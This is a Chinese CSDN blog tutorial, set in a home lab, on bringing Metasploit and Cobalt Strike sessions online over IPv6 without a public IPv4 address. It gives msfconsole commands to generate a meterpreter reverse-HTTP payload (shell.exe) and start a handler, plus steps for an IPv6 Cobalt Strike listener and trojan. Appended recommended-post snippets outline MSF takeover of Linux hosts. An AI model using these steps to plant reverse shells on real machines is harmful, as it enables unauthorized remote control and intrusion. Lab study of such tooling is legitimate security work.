Ipv6,无公网地址上线MSF和CS

最新推荐文章于 2024-05-04 23:09:29 发布
最新推荐文章于 2024-05-04 23:09:29 发布
阅读量208 收藏
点赞数 1
文章标签: 服务器 linux 运维 网络安全 网络攻击模型 计算机网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_76986722/article/details/134493827
版权

这边是用的手机热点,先查看是否有ipv6服务

设置桥接模式

sudo  /etc/init.d/networking  restart    kali重启网络服务

Ipv6上线MSF

实验环境:

Kali     win10靶机     win10本地

桥接       桥接          连接手机热点

ifconfig

第一个地址(fe80::20c:29ff:-------)是一个具有64位前缀长度和0x20(链路)作用域IDIPv6链路本地地址。

第二个地址(2408:8421:3d6:90------------)是一个具有64位前缀长度和0x0(全局)作用域IDIPv6全局地址。

Msfconsole

生成payload:

use payload/windows/x64/meterpreter_reverse_http

set LHOST ipv6

set LPORT 8848

generate -f exe -o shell.exe

back

开启监听:

use exploits/multi/handler

set payload windows/x64/meterpreter_reverse_http

set LHOST ipv6

set LPORT 8848

exploit

把生成的木马放到靶机上运行

The "ls" command requires the "stdapi" extension to be loaded (run: `load stdapi`)

“ls”命令需要加载“stdapi”扩展(运行:`load stdapi`)。

Load stdapi    报错需要加载下这个模块

上线CS

Kali                  win10

CS Server      CS client

 

Kali上开启CSserver

这边也是可以填ipv6的

添加监听器

HTTP Hosts 和http host(stager)填入我们kali(CS server)的ipv6地址

生成木马,选择我们刚才新建的监听器

把木马放到win10靶机上,运行

这是一些相关的文章,有兴趣可以瞧瞧

如何查看本机是否支持IPv6?_如何查看是否支持ipv6 -baijiahao-CSDN博客

无公网云主机上线对方电脑 | 利用家用设备的 IPv6 地址来建立 C2 服务器 | CN-SEC 中文网

无需公网IP 上线CS与MSF

https://www.bilibili.com/video/BV1Ss4y1R7Fu/?spm_id_from=333.999.0.0

Skunk Work
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
比较RationalUnifiedProcess(RUP)和MicrosoftSolutionsFramework(MSF)
03-03
火龙果软件工程技术中心  本文内容包括:RUP和MSF的定义第一印象:从MSF到RUP的高层的映射过程设想映射其他元素原则结束语致谢:注释参考文献:现在对本文进行讨论!参考资料本文来自于RationalEdge:MicrosoftSolutionsFramework和Rational统一过程(RationalUnifiedProcess,RUP)都为软件开发团队提供过程指导,但您如何对二者进行比较呢?本文指出了两个框架主要的结构上的差别和相似之处。 如果您是过程工程师、过程分析人员,或者是想要为了组织的软件工作而将市场上可以买到的框架标准化的团队领导,那么本文很适合您。我的目标是指出Ratio
mysql跨网段_超详细!! sql server 同步数据库 发布 订阅 跨网段 无公网ip 常见问题...
weixin_39603476的博客
01-28 421
问题描述主机1:发布端阿里云服务器--有公网ip主机2:订阅端笔记本--无公网ip数据量很小,主要是熟悉发布订阅的操作流程。主机2仅仅作为主机1的本地备份,要求修改云服务器上数据后,能通过sql server的发布订阅功能将本地数据同步。底下没有一步一步介绍,一步一步的,可以看下面这篇https://blog.csdn.net/u012861467/article/details/76411216...
公网ECS/云桌面通过有公网ECS部署Squid 实现私网访问外网实践
chengxunhg的博客
06-06 913
本示例应用场景 场景一:云桌面访问外网(internet) 云桌面(Workspace)是一种基于云计算的优于个人电脑(PC)和传统本地虚拟桌面基础设施(VDI)解决方案的桌面服务。提供和PC一样的配置(包括vCPU、GPU、内存、磁盘)以及您所熟悉的Windows操作系统,您可以像使用自己的PC一样使用Workspace。 由于云桌面创建完毕之后并没有公网IP,如需访问外网,即可通过本示例...
iptables实现华为云服务器无公网IP上网
weixin_43984145的博客
03-06 1231
本案例环境,centos 7.4 代理服务器 内网IP 192.168.3.69 关闭网卡的原目的检查 控制台>弹性云服务器>网卡 2 在虚拟私有云控制台 ,添加路由 ,指定代理服务器私有IP为下一跳地址 3确保代理服务器能上网 4 开启代理服务器IP转发功能 echo net.ipv4.ip_forward=1 >> /etc/sysctl.conf sys...
内网安全-流量隧道(一)不出网CS线&正反向&端口转发
weixin_45701675的博客
04-16 3327
内网-隧道技术
为什么说IPv6比IPv4更为安全
weixin_33866037的博客
06-26 2299
为什么80%的码农都做不了架构师?>>> ...
闲谈IPv6-典型特征的一些技术细节
系统运维
11-10 253
0.巨大的地址空间这个已经不用再说了。除了空间巨大,固定长度的前缀分配也使得地址分配更加均衡。1.ICMPv6真正的有了用武之地:地址/路由配置的自动化IPv6使得联网设备真的成了即插即用,一切都是通过自动生成的链路本地地址开始的,如果没有这个开始,将不会存在后续的自动化。任何支持IPv6的设备都会为接口生成一个链路本地地址,所有的链路本地地址都是FE80开头的,巧妙的是最后的64位,是通过链路层...
中国首个公共IPv6 DNS服务器上线
Listen2You的博客
02-08 2682
国务院昨天公布了《推进互联网协议第六版(IPv6)规模部署行动计划》,宣布要推进 IPv6 和网络实名制。与此同时,下一代互联网国家工程中心宣布在中国部署了 4 台 IPv6 根服务器,宣布了递归服务 IPv6 升级解决方案 “6DNS 系统” ,以及首个 IPv6 公共 DNS——首选 DNS:240c::6666,备用 DNS:240c::6644。下一代互联网国家工程中心称在北京、广州、兰州...
内网安全:隧道技术详解
qq_61553520的博客
06-06 6311
SMB(Server Message Block)协议是一种在计算机网络中共享文件、打印机和其他资源的通信协议。它最初由微软开发,用于在局域网中的计算机之间共享文件和资源,445端口运行打印机共享:SMB协议支持打印机的共享,允许用户在网络中使用共享打印机进行打印操作。通过SMB协议,用户可以连接到其他计算机上的共享打印机,并发送打印任务进行打印。文件共享:SMB协议允许计算机之间共享文件和目录。通过SMB协议,用户可以在网络中访问其他计算机上的共享文件夹,并进行文件的读取、写入和管理操作。
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。...MSF指导由原理、模型和用来管理人员、项目和技术元素的准则
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
基于MSF的增强版多源传感器融合框架 (VSLAMIMUGNSS).zip
01-24
ETH的MSF是一个非常优秀的多源传感器融合(松耦合)开源框架,尽管是松耦合,但是最终经过修改和调试后的MSF的效果依然让我觉得非常惊喜。同时由于MSF原始代码非常的不优美简洁,所以我特地将MSF源码作为一个“库”...
红队专题-Cobalt strike从小白到飞升手册
aming小老弟
10-09 730
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
38-5 Web应用防火墙 - WAF绕过基础知识及Web Server(服务器)层绕过
最新发布
weixin_43263566的博客
05-04 143
Bypass WAF(Web Application Firewall)实际上是利用位于 WAF 设备之后处理应用层数据包的硬件/软件特性。这些特性使得攻击载荷可以绕过防护,而不被WAF检测到。这些特性就像是特定的场景,一些已被研究人员发现,一些则尚未被发现,等待研究人员挖掘。当攻击载荷满足这些场景时,如果WAF没有考虑到这些场景,我们就可以利用这些特性绕过WAF。假设客户端访问URL为:http://www.example.com/1.php?该请求的目的是获取服务器上数据库中id为1的记录。
企业计算机服务器中了devicdata勒索病毒怎么处理,devicdata解密数据恢复
M99W1230的博客
05-03 443
网络技术的不断应用与发展,加快了社会进步的步伐,越来越多的企业利用网络开展各项工作业务,网络为企业提供了极大便利,大大提高了生产效率,网络数据安全问题成为了众多企业关心的主要话题。Devicdata勒索病毒是国外知名的勒索组织,该勒索病毒下有多个团队,时不时就会对企业的计算机服务器发起攻击,给国内众多企业带来了严重威胁,而devicdata勒索病毒经过多年网络技术的不断发展,采用了新升级后的加密算法,具有较强的攻击与加密能力,加密后的文件几乎全部为全字节格式,非专业技术人员很难自行破解恢复。
HCIP第二节
2301_78530830的博客
05-02 1076
加载,查看完其他邻接发过来的DBD后,基于当中本地未知的LSA信息,使用LSR查询,对端使用LSU来共享这些LSA信息,本地收到后需要ACK进行确认,邻接间数据保持一致。预启动,使用不携带数据库目录信息的DBD包进行主从关系的选举,RID数值大为主,优先进入下一个状态--排序(避免同时更新,导致网络拥塞)邻居关系建立后,关注条件,条件不匹配的邻居间,将维持邻居关系,仅hello包周期保活即可,启动配置完成后1,邻居间组播收发hello包,获取对端的RID,建立邻居关系,生成邻居;
【Linux】深入探讨 Linux 中的 `ln` 命令:创建链接的艺术
风是自由的,你也是。
05-02 515
ln 命令用于创建两种类型的链接:硬链接和软链接(符号链接)。了解这两种链接的区别和适用场景对于有效使用这一命令至关重要。<target>是您想要链接的原始文件。是链接的名称。掌握 ln 命令及其选项可以极大地提升在 Linux 环境下的文件管理效率。了解何时使用硬链接与软链接,并理解它们的行为,将帮助您更好地组织和管理文件系统。希望本文能帮助您更深入地了解 ln 命令,有效地利用链接来管理您的文件和目录。
Spring中的FileCopyUtils:文件复制的利器与详解
m0_51176516的博客
05-02 827
在Spring框架中,FileCopyUtils是一个用于文件复制操作的实用工具类。它提供了一系列静态方法,简化了文件从输入流到输出流、从文件到文件等的复制过程。这些方法都基于NIO(New I/O)技术,提供了高效的文件复制能力。
MSF线linux
03-18
MSF(Metasploit Framework)中,上线Linux主机是指通过漏洞利用或其他方式成功获取对目标Linux系统的控制权限。下面是一种常见的上线Linux主机的方法: 1. 扫描目标:使用MSF中的扫描模块,如nmap或auxiliary/scanner/tcp/syn扫描器,来确定目标主机的开放端口和服务。 2. 选择合适的漏洞利用模块:根据目标主机的开放端口和服务,选择合适的漏洞利用模块。例如,如果目标主机开放了SSH服务,可以使用exploit/unix/ssh/login_pubkey模块进行漏洞利用。 3. 配置漏洞利用模块:根据目标主机的具体情况,配置漏洞利用模块的参数。例如,设置目标IP地址、用户名、密码等。 4. 运行漏洞利用模块:运行漏洞利用模块,尝试获取对目标Linux系统的控制权限。 5. 上线成功:如果漏洞利用成功,你将获得对目标Linux系统的控制权限,并可以执行各种操作,如查看文件、执行命令等。 请注意,上线Linux主机是一项涉及安全攻击和渗透测试的技术,请确保在合法和授权的情况下使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值